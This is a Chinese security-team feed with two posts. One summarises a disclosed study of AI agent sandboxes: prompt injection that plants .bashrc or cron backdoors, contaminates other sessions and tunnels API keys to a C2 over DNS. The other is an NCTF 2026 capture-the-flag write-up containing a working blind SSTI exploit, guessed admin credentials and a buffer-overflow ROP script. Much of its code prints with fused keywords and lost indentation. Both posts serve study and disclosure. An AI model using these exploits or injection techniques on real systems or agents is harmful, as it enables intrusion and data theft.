ChaMd5安全团队

Agent Security 沙箱可持久化深度报告

Tue, 14 Apr 2026 08:03:00 +0800

原创 ChaMD5 AI Group 2026-04-14 08:03 辽宁

近日由 ChaMd5 AI 安全团队 L 师傅主导，Q 师傅和 B 师傅协助，对各互联网产想 Agent 详细的安全测试结果。在负责任披露的前提下，相关安全测试结果已经提交到对应厂商的 SRC 并获取反馈。

背景

现状：从“对话框”到“自动化执行器”的演变

当前，主流大模型厂商（如 OpenAI、Google、Anthropic 等）推出的 Agent 应用已不仅局限于文本生成，而是演变为具备复杂任务编排能力的集成式工作流。通过网页端，Agent 能够根据用户的复杂指令，动态地调用代码解释器（Code Interpreter）。为了确保安全，这些代码通常运行在高度隔离的沙箱环境（Sandbox）中。这种机制极大地增强了模型处理结构化数据、生成图表以及执行复杂逻辑交付的能力，使用户任务的完成度从“建议”层面提升到了“工程”层面。

核心风险点：提示词注入引发的“自然语言 RCE”

然而，随着功能复杂度的提升，安全边界也随之变得模糊。最核心的隐患在于：提示词注入（Prompt Injection）是否能够转化为针对沙箱环境的实质性控制？
在传统网络安全中，远程代码执行（RCE）通过漏洞触发；而在 Agent 场景下，攻击者可能通过精心构造的网页提示词或引诱 Agent 加载恶意外部插件/网页，以“自然语言”的形式诱导模型在沙箱内执行具有持久化意图的恶意代码。

深度隐患：沙箱持久化与跨域复用

如果沙箱的设计存在缺陷，攻击者可能尝试以下进阶攻击路径：

沙箱持久化 (Sandbox Persistence): 探索是否可以通过特定的脚本注入，在沙箱文件系统或进程空间内实现驻留，规避任务结束后的销毁机制。
跨账户/跨任务复用 (Cross-Session/Account Reuse): 验证是否存在一种方式，使得在任务A 中构造的恶意环境或敏感配置，能够通过某种隐蔽通道或缓存机制，“污染”到任务 B 甚至其他用户的会话环境中。
越狱与公网外泄：测试沙箱是否可以通过复杂的协议隧道(如利用DNS请求、特定API 调用等)绕过出口限制，实现与攻击者控制端 (C2) 的公网通信，从而外泄沙箱内的敏感上下文数据。

核心测试维度

维度 A: 提示词诱导下的持久化植入

测试是否能通过特定指令，使Agent在沙箱文件系统中留下“逻辑后门”(如修改.bashrc 或植入定时任务),从而在用户开启新会话时自动激活恶意逻辑。

维度B: 沙箱隔离性边界探测(侧向移动)

利用内存溢出或文件系统漏洞，尝试探测同一宿主机下不同用户沙箱的残留信息，验证是否存在跨租户的数据泄露风险。

维度C: 外发通信与隐蔽隧道

在严格受限的网络环境下，尝试利用DNS重定向、HTTP Header走私等手段，测试沙箱内敏感数据(如环境变量、 API Key) 回传至外部控制端(C2)的可能性。

维度 D: 水平越权与会话污染

验证 Agent 在多任务切换过程中，是否会错误地将上一个任务的权限或上下文携带至下一个不相关的任务中，导致权限边界崩溃。

为了验证前述关于沙箱持久化及跨账户复用的猜想，测试小组构建了四个测试模块，并进行了深度安全测试。详细报告下载请见下面pdf 下载链接。

通过网盘分享的文件：Agent Security 沙箱可持久化深度报告-2026-04-13-ChaMD5 AI Group.pdf

链接: https://pan.baidu.com/s/147cCgSpNbl4WNTnj72lf9w?pwd=3itf 提取码: 3itf

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

跳转微信打开

2026NCTF Writeup by Mini-Venom

Tue, 07 Apr 2026 10:30:00 +0800

原创 Mini-Venom 2026-04-07 10:30 辽宁

Web

N-Horse

打ssti盲注

GET /?username={{cycler.__init__.__globals__.os.popen('sleep 5').read()}}&password=1

Exp:

#!/usr/bin/env python3
import argparse
import string
import sys
import time
import requests
DEFAULT_CHARSET = "{}_-" + string.ascii_letters + string.digits
DEFAULT_CANDIDATE_PATHS = [
"/flag",
"/flag.txt",
"/app/flag",
"/app/flag.txt",
"/tmp/flag",
"/home/ctf/flag",
"/home/ctf/flag.txt",
]
classBlindSSTIExploit:
def__init__(self, base_url, delay, timeout, charset, proxy=None):
        self.base_url = base_url.rstrip("/") + "/"
        self.delay = delay
        self.timeout = timeout
        self.charset = charset
        self.session = requests.Session()
if proxy:
            self.session.proxies.update({"http": proxy, "https": proxy})
    @staticmethod
defbuild_payload(command):
        escaped = command.replace("\\", "\\\\").replace("'", "\\'")
return"{{cycler.__init__.__globals__.os.popen('%s').read()}}" % escaped
defrequest_time(self, payload):
        start = time.time()
try:
            self.session.get(
                self.base_url,
                params={"username": payload, "password": "1"},
                timeout=self.timeout,
            )
except requests.RequestException:
pass
return time.time() - start
deforacle(self, command, threshold=None):
        payload = self.build_payload(command)
        elapsed = self.request_time(payload)
        limit = threshold if threshold isnotNoneelse (self.delay - 0.5)
return elapsed > limit, elapsed
defconfirm_rce(self):
        ok, elapsed = self.oracle(f"sleep {self.delay}")
return ok, elapsed
deffind_flag_path(self, paths):
for path in paths:
            ok, elapsed = self.oracle(f"test -f {path} && sleep {self.delay}")
            print(f"[path] {path:<24} hit={ok} time={elapsed:.2f}s")
if ok:
return path
returnNone
defget_length(self, path, max_len):
for size in range(1, max_len + 1):
            ok, elapsed = self.oracle(
f"[ $(wc -c < {path}) -eq {size} ] && sleep {self.delay}"
            )
if ok:
                print(f"[len] {size} time={elapsed:.2f}s")
return size
returnNone
defextract_char(self, path, position):
for ch in self.charset:
            ok, elapsed = self.oracle(
f"[ \"$(cut -c{position}{path})\" = '{ch}' ] && sleep {self.delay}"
            )
if ok:
                print(f"[chr] pos={position:<2} char={ch!r} time={elapsed:.2f}s")
return ch
returnNone
defextract_value(self, path, length):
        value = []
for position in range(1, length + 1):
            ch = self.extract_char(path, position)
if ch isNone:
                print(f"[!] failed at position {position}", file=sys.stderr)
break
            value.append(ch)
            print(f"[cur] {''.join(value)}")
return"".join(value)
defparse_args():
    parser = argparse.ArgumentParser(
        description="Blind Jinja2 SSTI exploit for the N-Horse challenge."
    )
    parser.add_argument(
"-u",
"--url",
        default="http://114.66.24.221:32571/",
        help="Target base URL.",
    )
    parser.add_argument(
"-d",
"--delay",
        type=int,
        default=3,
        help="Sleep delay used by the time-based oracle.",
    )
    parser.add_argument(
"-t",
"--timeout",
        type=int,
        default=8,
        help="HTTP request timeout.",
    )
    parser.add_argument(
"-m",
"--max-len",
        type=int,
        default=80,
        help="Maximum flag length to probe.",
    )
    parser.add_argument(
"-c",
"--charset",
        default=DEFAULT_CHARSET,
        help="Character set for blind extraction.",
    )
    parser.add_argument(
"-p",
"--paths",
        nargs="*",
        default=DEFAULT_CANDIDATE_PATHS,
        help="Candidate flag paths.",
    )
    parser.add_argument(
"--proxy",
        help="Optional proxy URL, for example http://127.0.0.1:8080",
    )
return parser.parse_args()
defmain():
    args = parse_args()
    exploit = BlindSSTIExploit(
        base_url=args.url,
        delay=args.delay,
        timeout=args.timeout,
        charset=args.charset,
        proxy=args.proxy,
    )
    ok, elapsed = exploit.confirm_rce()
    print(f"[rce] confirmed={ok} time={elapsed:.2f}s")
ifnot ok:
        print("[!] RCE confirmation failed", file=sys.stderr)
        sys.exit(1)
    flag_path = exploit.find_flag_path(args.paths)
ifnot flag_path:
        print("[!] no candidate flag path matched", file=sys.stderr)
        sys.exit(1)
    print(f"[+] flag path: {flag_path}")
    length = exploit.get_length(flag_path, args.max_len)
ifnot length:
        print("[!] failed to determine flag length", file=sys.stderr)
        sys.exit(1)
    flag = exploit.extract_value(flag_path, length)
    print(f"[+] final flag: {flag}")
if __name__ == "__main__":
    main()
#python exp.py -u url

N-RustPICA

首页是一个典型 SPA，真正数据靠前端 JS 再去请求 API。

js源码里泄露了很多接口

这一步说明两件事：

后台确实存在，不是纯前端假页面
有一个旧流程模板接口 /api/admin/templates/review-flow

默认用户名已经给了：anime_admin

然后针对 anime_admin 试少量强相关密码：

anime_admin
admin
123456
purestream
站点/品牌名变体

关键命中是：

用户名：anime_admin
密码：purestream

登录后台，找到隐藏条目

拿着 Cookie 访问后台列表：

curl -b "nctf_admin_session=27506416-d601-4954-a5b1-be02eb9e1fd7" \
  http://114.66.24.221:32833/api/admin/anime

返回里可以看到一条公开页面没有的内部条目：

{
  "id":"anime-0007",
  "name":"内部审片 07",
  "status":"internal"
}

curl -b "nctf_admin_session=27506416-d601-4954-a5b1-be02eb9e1fd7" \
  http://114.66.24.221:32833/api/admin/anime/anime-0007

旧流程模板接口：

curl -b "nctf_admin_session=27506416-d601-4954-a5b1-be02eb9e1fd7" \
  http://114.66.24.221:32833/api/admin/templates/review-flow

这说明：

后台仍然支持旧审核流程
发布内部条目需要完整 JSON
字段名、大小写、值格式都已经被泄露

直接拿模板去打状态迁移接口：

curl -b "nctf_admin_session=27506416-d601-4954-a5b1-be02eb9e1fd7" \
  -H "Content-Type: application/json" \
  -X POST \
  -d "{\"action\":\"publish\",\"targetStatus\":\"published\",\"reviewerToken\":\"FEATURE-REVIEW-2025\",\"featured\":false,\"approvalTicket\":\"PENDING-APPROVAL\"}" \
  http://114.66.24.221:32833/api/admin/anime/anime-0007/transition

exp

import requests
BASE = "http://114.66.24.221:32833"
USERNAME = "anime_admin"
PASSWORD = "purestream"
TARGET_ID = "anime-0007"
s = requests.Session()
def login():
    r = s.post(
        f"{BASE}/api/auth/login",
        json={"username": USERNAME, "password": PASSWORD},
        timeout=10,
    )
    print("[login]", r.status_code, r.text)
    r.raise_for_status()
def list_admin_anime():
    r = s.get(f"{BASE}/api/admin/anime", timeout=10)
    print("[admin list]", r.status_code)
    print(r.text)
    r.raise_for_status()
def get_template():
    r = s.get(f"{BASE}/api/admin/templates/review-flow", timeout=10)
    print("[template]", r.status_code)
    print(r.text)
    r.raise_for_status()
    return r.json()["data"]["payload"]
def publish_hidden_item(payload):
    r = s.post(
        f"{BASE}/api/admin/anime/{TARGET_ID}/transition",
        json=payload,
        timeout=10,
    )
    print("[transition]", r.status_code)
    print(r.text)
    r.raise_for_status()
    return r.json()["data"]
def fetch_public():
    r = s.get(f"{BASE}/api/anime/{TARGET_ID}", timeout=10)
    print("[public]", r.status_code)
    print(r.text)
    r.raise_for_status()
def main():
    login()
    list_admin_anime()
    payload = get_template()
    data = publish_hidden_item(payload)
    print("[flag]", data["description"])
    fetch_public()
if __name__ == "__main__":
    main()

Crypto:

RNG GAME

非预期，seed给你了，你传一个-seed就行

Encryption

有点难绷，看这个函数，很明显可以打pwn试试

前面输入用的gets(s)，写了个 strlen(s) <= 64 检查，经典x00 绕过，s 到返回地址的偏移是 0x3e8

payload = b"A\x00" + b"B" * (0x3e8 - 2) + rop_chain

rop打到puts(0x404120)，flag在env，ai写个脚本就行了

import socket
import sys
HOST = "114.66.24.221"
PORT = 45625
OFFSET = 0x3E8
RET = 0x401384
WIN = 0x401436
defrecv_until(sock: socket.socket, marker: bytes) -> bytes:
    data = b""
while marker notin data:
        chunk = sock.recv(4096)
ifnot chunk:
break
        data += chunk
return data
defp64(x: int) -> bytes:
return x.to_bytes(8, "little")
defbuild_payload() -> bytes:
    prefix = b"A\x00"
    body = b"B" * (OFFSET - len(prefix))
    chain = p64(RET) + p64(WIN)
return prefix + body + chain + b"\n"
defmain() -> None:
with socket.create_connection((HOST, PORT)) as sock:
        banner = recv_until(sock, b"Enter plaintext in chars (max 64 chars):")
        sys.stdout.buffer.write(banner)
        payload = build_payload()
        sock.sendall(payload)
        sock.sendall(b"id\n")
        sock.sendall(b"env\n")
        sock.sendall(b"exit\n")
        out = b""
whileTrue:
            chunk = sock.recv(4096)
ifnot chunk:
break
            out += chunk
        sys.stdout.buffer.write(out)
if __name__ == "__main__":
    main()

Hard_RSA

RSA 参数设计错误 / 连分数恢复私钥

【利用思路】

读取题目给出的 N,e,c
对 e / N^6 做连分数展开
枚举收敛分数，取分母作为候选 d
验证 pow(pow(2,e,N), d, N) == 2
用恢复出的 d 解密：m = c^d mod N

from Crypto.Util.number import long_to_bytes
  N =
7491931416296662302678040939463573085135942396204215280467335969606230359294879222523795932572433201519389341189645828
5500680923291830113157053732353835717437056282529643649606999636042375356170625223068407005600597432512115745426297620
503763041544738664221739366981075762409535100379250338620618401995088237
  e =
1153824403638514961639818404863841074925611920439359070589802660868275288864817537092056019777218548066098732559309350
3235209882333675857851474205201766462432088073466850502595023973151957686582380596898621380931508465493173088358286330
9373723686304734918644860412520769285969343584540789781409990492019944165824625815300405767426485317259941101998781323
4114664637773067535840005971643704401304633224724285123598420799123703273039535358472884867922657292715197034394927723
3011029222764893685565282262244129049104632998451966637247546081307659293329283003511688745174518374510090612743167704
8635228709073140092528296564430074027966676751247853438866388663691773416941464827914578065911403270794793189044046310
3618123701557719705293537574753223327216241464106157844527314938761922953377602432457545712660924842168081526560420933
1736613532922579287990041668851687948185505555509004316267249966274661709732412666527915403908735414263189907258359187
5973448566342261418757933958097491430624847778317939143939884707606327061346526895306935081814341167557148974540052519
7644208375041516872450030549456915656444133514687363200447949063269742093913874380805034664126688718002946366424146524
5985156434076104118673576094970348315849796818522310872179048366579621238189976885338169261175873954385632163125064977
1030357257110672427660801480674245151183281118006855095936338551269908982677103650278164957043853181158383261830382128
3735624012787652232638988271174869139150027898591314583555691551090584707803956302609222508026439844685112862314576081
0617559782990517641712522695944468239392218993328870979897380758635248751632971297625794450375551655200515470812229951
5447476835290766731627959030431596313710392337334874777621376729257439721939577794752381362801045781355354034613981044
768946879601448500750228731652608416508751483139575431367276816127751324213761
  c =
4659710183444999541492771613628739079293726348549869560762261327498530391914809927737937049962561673944719228936095789
2792459785981292432370520768029645163669042553465834050214430965629198749117682681268121937191602353019996971164117733
452207322953311422907574742284390173017434719506924876701654539254320355
defcont_frac(n, d):
while d:
          a = n // d
yield a
          n, d = d, n - a * d
defconvergents(cf):
      p0, p1 = 0, 1
      q0, q1 = 1, 0
for a in cf:
          p0, p1 = p1, a * p1 + p0
          q0, q1 = q1, a * q1 + q0
yield p1, q1
for k, d in convergents(cont_frac(e, N**6)):
if d and pow(pow(2, e, N), d, N) == 2:
          print(long_to_bytes(pow(c, d, N)))
break

Reverse:

Pay For 2048

核心逻辑在app.asar里面，里面有个wasm，wasm2c wasm_core.wasm > 1.c转成c看看，flag校验是通过NCTF-XXXX-XXXX-XXXX这12位X校验的，自定义hash是0xFC97CA2F，hash逻辑是

functionrol(x, n) {
return ((x << n) | (x >>> (32 - n))) >>> 0;
  }
functioncheck(norm) {
let b = 4951 >>> 0;
for (let c = 0; c < norm.length; c++) {
const f = norm.charCodeAt(c) >>> 0;
const sel = (c & 1) ? 40503 : 17881;
const t1 = ((((sel + f) >>> 0) * (c + 11)) >>> 0 ^ rol(b, 3)) >>> 0;
const t2 = (((f << (c % 5)) >>> 0) ^ 0xA5A55A5A) >>> 0;
      b = (t1 + t2) >>> 0;
    }
return b === 0xFC97CA2F;
  }

unlock_flag 里用固定密文和 normalized_key + "|arcade::unlock-seed" 做按字节异或，固定字符串 "| arcade::unlock-seed" 直接出现在 rodata 中。flag是uuid格式，这样可以得到前五位必定是RU57W

那么枚举后6位爆hash就行了

key是NCTF-RU57-W45M-2048

调用wasm就能拿到flag NCTF{bff16266-c4f2-4dbb-b270-f5ded900b54c}

const fs = require('fs');
const bytes = fs.readFileSync('wasm_core.wasm');
(async () => {
const { instance } = await WebAssembly.instantiate(bytes, {});
const te = new TextEncoder();
const td = new TextDecoder();
functioncall(name, payload) {
const input = te.encode(JSON.stringify(payload));
const ptr = instance.exports.alloc(input.length);
let mem = newUint8Array(instance.exports.memory.buffer);
      mem.set(input, ptr);
const packed = BigInt(instance.exports[name](ptr, input.length));
      mem = newUint8Array(instance.exports.memory.buffer);
      instance.exports.free(ptr, input.length);
const outPtr = Number(packed & 0xffffffffn);
const outLen = Number((packed >> 32n) & 0xffffffffn);
const out = td.decode(mem.slice(outPtr, outPtr + outLen));
      instance.exports.free(outPtr, outLen);
returnJSON.parse(out);
    }
const key = 'NCTF-RU57-W45M-2048';
const verify = call('verify_license', {
      key,
score: 0,
steps: 0,
maxTile: 256,
board: Array(16).fill(0),
sessionToken: ''
    });
console.log('verify =', verify);
const unlock = call('unlock_flag', {
      key,
score: 0,
steps: 0,
maxTile: 2048,
board: Array(16).fill(0),
sessionToken: verify.data.sessionToken
    });
console.log('unlock =', unlock);
  })();

VM Encryptor

命令行程序，vm在偏移1270h，写了个vm解释器

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import argparse
from dataclasses import dataclass, field
from pathlib import Path
from typing import List
MEM_SIZE = 0x10000
STACK_SIZE = 0x1000
OPNAMES = {
0x00: "JMP",
0x01: "JZ",
0x02: "JNZ",
0x03: "PUSH8",
0x04: "PUSH32",
0x05: "LOAD8",
0x06: "LOAD32",
0x07: "POP",
0x08: "STORE8",
0x09: "STORE32",
0x0A: "ADD",
0x0B: "SUB",
0x0C: "MUL",
0x0D: "DIV",
0x0E: "MOD",
0x0F: "AND",
0x10: "OR",
0x11: "NOT",
0x12: "XOR",
0x13: "SHL",
0x14: "SHR",
0x15: "EQ",
0x16: "EQ2",
0x17: "NE",
0x18: "LT",
0x19: "GT",
0x1A: "LE",
0x1B: "GE",
0x1C: "DUP",
0x1D: "SWAP",
0x1E: "CALL",
0x1F: "RET",
0x20: "PRINT",
0xFF: "HALT",
}
defu32(v: int) -> int:
return v & 0xFFFFFFFF
defi32(v: int) -> int:
    v &= 0xFFFFFFFF
return v if v < 0x80000000else v - 0x100000000
defrd_u32(mem: bytearray, addr: int) -> int:
ifnot (0 <= addr <= 0xFFFC):
raise ValueError("mem oob")
return int.from_bytes(mem[addr : addr + 4], "little")
defwr_u32(mem: bytearray, addr: int, val: int) -> None:
ifnot (0 <= addr <= 0xFFFC):
raise ValueError("mem oob")
    mem[addr : addr + 4] = u32(val).to_bytes(4, "little")
defrd_imm32(mem: bytearray, ip: int) -> int:
if ip + 4 >= MEM_SIZE:
raise ValueError("ip oob")
return int.from_bytes(mem[ip + 1 : ip + 5], "little")
@dataclass
classVM:
    mem: bytearray = field(default_factory=lambda: bytearray(MEM_SIZE))
    stack: List[int] = field(default_factory=lambda: [0] * STACK_SIZE)
    ip: int = 0
    sp: int = 0
    running: int = 1
    error: int = 0
defpush(self, v: int):
if self.sp > 0xFFF:
            self.error, self.running = 2, 0
return
        self.stack[self.sp] = u32(v)
        self.sp += 1
defpop(self) -> int:
if self.sp == 0:
            self.error, self.running = 3, 0
return0
        self.sp -= 1
return self.stack[self.sp]
defbinop(self, fn):
if self.sp < 2:
            self.error, self.running = 3, 0
return
        b = self.pop()
        a = self.pop()
if self.error:
return
        self.push(fn(a, b))
defstep(self, trace=False):
if self.error ornot self.running:
return
        op = self.mem[self.ip]
if trace:
            top = self.stack[self.sp - 1] if self.sp elseNone
            print(f"ip={self.ip:04x} op={op:02x}{OPNAMES.get(op,'?')} sp={self.sp} top={top}")
try:
if op == 0x00:  # JMP imm32
                self.ip = rd_imm32(self.mem, self.ip)
elif op == 0x01:  # JZ imm32 (pop)
                dst = rd_imm32(self.mem, self.ip)
                self.ip += 5
                v = self.pop()
if self.error:
return
if v == 0:
                    self.ip = dst
elif op == 0x02:  # JNZ imm32 (pop)
                dst = rd_imm32(self.mem, self.ip)
                self.ip += 5
                v = self.pop()
if self.error:
return
if v != 0:
                    self.ip = dst
elif op == 0x03:  # PUSH8 imm8
                self.push(self.mem[self.ip + 1])
                self.ip += 2
elif op == 0x04:  # PUSH32 imm32
                self.push(rd_imm32(self.mem, self.ip))
                self.ip += 5
elif op == 0x05:  # LOAD8 [addr]
                addr = self.pop()
if self.error:
return
ifnot (0 <= addr <= 0xFFFF):
                    self.error, self.running = 4, 0
return
                self.push(self.mem[addr])
                self.ip += 1
elif op == 0x06:  # LOAD32 [addr]
                addr = self.pop()
if self.error:
return
                self.push(rd_u32(self.mem, addr))
                self.ip += 1
elif op == 0x07:  # POP
                _ = self.pop()
                self.ip += 1
elif op == 0x08:  # STORE8 [addr] = value
                addr = self.pop()
if self.error:
return
                val = self.pop()
if self.error:
return
ifnot (0 <= addr <= 0xFFFF):
                    self.error, self.running = 4, 0
return
                self.mem[addr] = val & 0xFF
                self.ip += 1
elif op == 0x09:  # STORE32 [addr] = value
                addr = self.pop()
if self.error:
return
                val = self.pop()
if self.error:
return
                wr_u32(self.mem, addr, val)
                self.ip += 1
elif op == 0x0A:
                self.binop(lambda a, b: a + b)
                self.ip += 1
elif op == 0x0B:
                self.binop(lambda a, b: a - b)
                self.ip += 1
elif op == 0x0C:
                self.binop(lambda a, b: a * b)
                self.ip += 1
elif op == 0x0D:  # DIV
if self.sp < 2:
                    self.error, self.running = 3, 0
return
                b = self.pop()
                a = self.pop()
if b == 0:
                    self.error, self.running = 5, 0
return
                self.push(i32(a) // i32(b))
                self.ip += 1
elif op == 0x0E:  # MOD
if self.sp < 2:
                    self.error, self.running = 3, 0
return
                b = self.pop()
                a = self.pop()
if b == 0:
                    self.error, self.running = 5, 0
return
                self.push(i32(a) % i32(b))
                self.ip += 1
elif op == 0x0F:
                self.binop(lambda a, b: a & b)
                self.ip += 1
elif op == 0x10:
                self.binop(lambda a, b: a | b)
                self.ip += 1
elif op == 0x11:
if self.sp < 1:
                    self.error, self.running = 3, 0
return
                self.stack[self.sp - 1] = u32(~self.stack[self.sp - 1])
                self.ip += 1
elif op == 0x12:
                self.binop(lambda a, b: a ^ b)
                self.ip += 1
elif op == 0x13:
                self.binop(lambda a, b: u32(a << (b & 0x1F)))
                self.ip += 1
elif op == 0x14:
                self.binop(lambda a, b: (a & 0xFFFFFFFF) >> (b & 0x1F))
                self.ip += 1
elif op in (0x15, 0x16):
                self.binop(lambda a, b: 1if a == b else0)
                self.ip += 1
elif op == 0x17:
                self.binop(lambda a, b: 1if a != b else0)
                self.ip += 1
elif op == 0x18:
                self.binop(lambda a, b: 1if i32(a) < i32(b) else0)
                self.ip += 1
elif op == 0x19:
                self.binop(lambda a, b: 1if i32(a) > i32(b) else0)
                self.ip += 1
elif op == 0x1A:
                self.binop(lambda a, b: 1if i32(a) <= i32(b) else0)
                self.ip += 1
elif op == 0x1B:
                self.binop(lambda a, b: 1if i32(a) >= i32(b) else0)
                self.ip += 1
elif op == 0x1C:  # DUP
if self.sp < 1:
                    self.error, self.running = 3, 0
return
                self.push(self.stack[self.sp - 1])
                self.ip += 1
elif op == 0x1D:  # SWAP
if self.sp < 2:
                    self.error, self.running = 3, 0
return
                self.stack[self.sp - 1], self.stack[self.sp - 2] = self.stack[self.sp - 2], self.stack[self.sp - 1]
                self.ip += 1
elif op == 0x1E:  # CALL imm32
                dst = rd_imm32(self.mem, self.ip)
                self.push(self.ip + 5)
if self.error:
return
                self.ip = dst
elif op == 0x1F:  # RET
                self.ip = self.pop()
elif op == 0x20:  # PRINT
                addr = self.pop()
if self.error:
return
ifnot (0 <= addr <= 0xFFFF):
                    self.error, self.running = 4, 0
return
                out = []
while addr < MEM_SIZE and self.mem[addr] != 0:
                    out.append(self.mem[addr])
                    addr += 1
if addr >= MEM_SIZE:
                    self.error, self.running = 4, 0
return
                print(bytes(out).decode("latin1", errors="replace"))
                self.ip += 1
elif op == 0xFF:  # HALT
                self.ip += 1
                self.running = 0
else:
                self.error, self.running = 1, 0
except ValueError:
            self.error, self.running = 4, 0
defrun(self, max_steps=5_000_000, trace=False):
        steps = 0
while self.running and self.error == 0:
            self.step(trace=trace)
            steps += 1
if steps >= max_steps:
                self.error, self.running = 6, 0
break
return steps
defdisasm(code: bytes, start=0, count=256):
    i = start
    end = min(len(code), start + count)
while i < end:
        op = code[i]
        name = OPNAMES.get(op, f"OP_{op:02X}")
if op in (0x00, 0x01, 0x02, 0x04, 0x1E):
if i + 5 <= len(code):
                imm = int.from_bytes(code[i + 1 : i + 5], "little")
                print(f"{i:06x}: {op:02x}{name:<7} 0x{imm:08x}")
else:
                print(f"{i:06x}: {op:02x}{name:<7} ")
            i += 5
elif op == 0x03:
            imm = code[i + 1] if i + 1 < len(code) else0
            print(f"{i:06x}: {op:02x}{name:<7} 0x{imm:02x}")
            i += 2
else:
            print(f"{i:06x}: {op:02x}{name}")
            i += 1
defmain():
    ap = argparse.ArgumentParser(description="vm-encryptor VM helper")
    ap.add_argument("code", help="path to code.bin")
    ap.add_argument("--flag", default="", help="inject flag at mem[0x1000]")
    ap.add_argument("--trace", action="store_true", help="trace each instruction")
    ap.add_argument("--max-steps", type=int, default=2_000_000)
    ap.add_argument("--disasm", action="store_true", help="disasm only")
    ap.add_argument("--start", type=lambda x: int(x, 0), default=0)
    ap.add_argument("--count", type=int, default=512)
    args = ap.parse_args()
    code = Path(args.code).read_bytes()
if args.disasm:
        disasm(code, start=args.start, count=args.count)
return
    vm = VM()
    vm.mem[: len(code)] = code
# 主程序会把用户输入复制到 VM 内存偏移 0x1000
    data = args.flag.encode("latin1", errors="ignore")[:42]
    vm.mem[0x1000 : 0x1000 + len(data)] = data
if0x1000 + len(data) < MEM_SIZE:
        vm.mem[0x1000 + len(data)] = 0
    steps = vm.run(max_steps=args.max_steps, trace=args.trace)
    print(f"\n[VM] steps={steps} halted={not vm.running} error={vm.error} ip=0x{vm.ip:08x} sp={vm.sp}")
if __name__ == "__main__":
    main()

然后分析code.bin，程序的核心验证逻辑是：将长为 42 字节的用户输入以每 3 字节（24 bits）为一组进行读取，经过三轮按位循环左移（ROL24）和对应的 XOR 运算后，将结果进行标准 Base64 编码，最后再把生成的 Base64 字符串逐字符与 0x63 进行异或，并同内置密文（275a0b080a3a090d30314c37023a120e542a4c302c3211270631563712264c3728325b375500481a0201112716004c372407113401365b27）比较。

Exp
import base64
defrotl24(v, amount):
    amount %= 24
return ((v << amount) | (v >> (24 - amount))) & 0xFFFFFF
defrotr24(v, amount):
    amount %= 24
return ((v >> amount) | (v << (24 - amount))) & 0xFFFFFF
defdecrypt_block(v_out):
    v = v_out
    v = rotr24(v, 20)
    v = v ^ 0x55757d
    v = rotr24(v, 11)
    v = v ^ 0x55757d
    v = rotr24(v, 5)
return v
defsolve():
    b64_str = 'D9hkiYjnSR/TaYqm7I/SOQrDeR5TqE/TKQ8T6c+yabrDuc/TGdrWbU8D'
    raw_bytes = base64.b64decode(b64_str)
    flag = bytearray()
for i in range(0, len(raw_bytes), 3):
        v_out = (raw_bytes[i] << 16) | (raw_bytes[i+1] << 8) | raw_bytes[i+2]
        v_in = decrypt_block(v_out)
        flag.append((v_in >> 16) & 0xFF)
        flag.append((v_in >> 8) & 0xFF)
        flag.append(v_in & 0xFF)
    print("Flag:", flag.decode('latin1', errors='replace'))
if __name__ == '__main__':
    solve()
# NCTF{1578be15-ad09-4859-9193-5d52585eb485}

No My Bank!

加密密钥d34bff62613fdd2861f6d5942c5e99a53ef3e90adbe9091b4686859d5b7dab22

可以提出来文件，分析

好像主要逻辑还在exe里面？

gd是游戏逻辑，校验主逻辑在dll，dump出来_libextension.dll，里面通过^ 0xBA解密了一段逻辑

是一个魔改base64 + 其中一个key为0x114514的xor，用这段逻辑解密题目的比较字符串然后替换三个字符成数字即可

EncFlag = [
0x2B, 0xF7, 0x67, 0x5E, 0x7C, 0x98, 0xED, 0x6D, 0xD1, 0x8C, 0xEF, 0x57,
0xBB, 0x33, 0x22, 0x7E, 0xB2, 0x1F, 0x34, 0x5B, 0x36, 0x6C, 0x2B, 0xAF,
0xBB, 0x5B, 0x12, 0xD6, 0x3C, 0x0A, 0x45, 0x27, 0x84, 0x6C, 0x47, 0xAB,
0x2F, 0x75, 0x78, 0x3E, 0x88, 0x89, 0x2D, 0x7A, 0xCD, 0x5C, 0xF6, 0xFA,
0x36, 0x73, 0xFF, 0x6E, 0xD3, 0x4C, 0x1C, 0x75,
]
ALPHABET = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"
SEED_INIT = 0x114514
LCG_MULTIPLIER = 0x01010193
LCG_INCREMENT = 0x12345678
defror8(value: int, count: int) -> int:
    count &= 7
return ((value >> count) | ((value << (8 - count)) & 0xFF)) & 0xFF
defundo_stream_transform(data: bytes) -> bytes:
    seed = SEED_INIT
    output = bytearray()
for index, value in enumerate(data):
        mask = (seed >> ((index * 8) % 24)) & 0xFF
        restored = ror8(value ^ 0xBA, 2) ^ mask
        output.append(restored)
        seed = (seed * LCG_MULTIPLIER + LCG_INCREMENT) & 0xFFFFFFFF
return bytes(output)
defunswap_quartets(data: bytes) -> bytes:
if len(data) % 4 != 0:
raise ValueError("encoded data length must be a multiple of 4")
    output = bytearray()
for index in range(0, len(data), 4):
        a, b, c, d = data[index:index + 4]
        output.extend((b, a, d, c))
return bytes(output)
defdecode_custom_base64(encoded: bytes) -> bytes:
    lookup = {ch: index for index, ch in enumerate(ALPHABET)}
    output = bytearray()
for index in range(0, len(encoded), 4):
        c1, c2, c3, c4 = (chr(byte) for byte in encoded[index:index + 4])
        v1 = lookup[c1]
        v2 = lookup[c2]
        v3 = 0if c3 == "="else lookup[c3]
        v4 = 0if c4 == "="else lookup[c4]
        output.append(((v1 << 2) | (v2 >> 4)) & 0xFF)
if c3 != "=":
            output.append((((v2 & 0x0F) << 4) | (v3 >> 2)) & 0xFF)
if c4 != "=":
            output.append((((v3 & 0x03) << 6) | v4) & 0xFF)
return bytes(output)
defrecover_flag(EncFlag: bytes) -> tuple[str, str, str]:
    swapped = undo_stream_transform(EncFlag)
    normal = unswap_quartets(swapped)
    raw_flag = decode_custom_base64(normal).decode("ascii")
    display_flag = raw_flag.replace("o", "0").replace("e", "3").replace("i", "1")
return swapped.decode("ascii"), raw_flag, display_flag
if __name__ == "__main__":
    swapped_text, raw_flag, display_flag = recover_flag(EncFlag)
    print(swapped_text)
    print(raw_flag)
    print(display_flag)

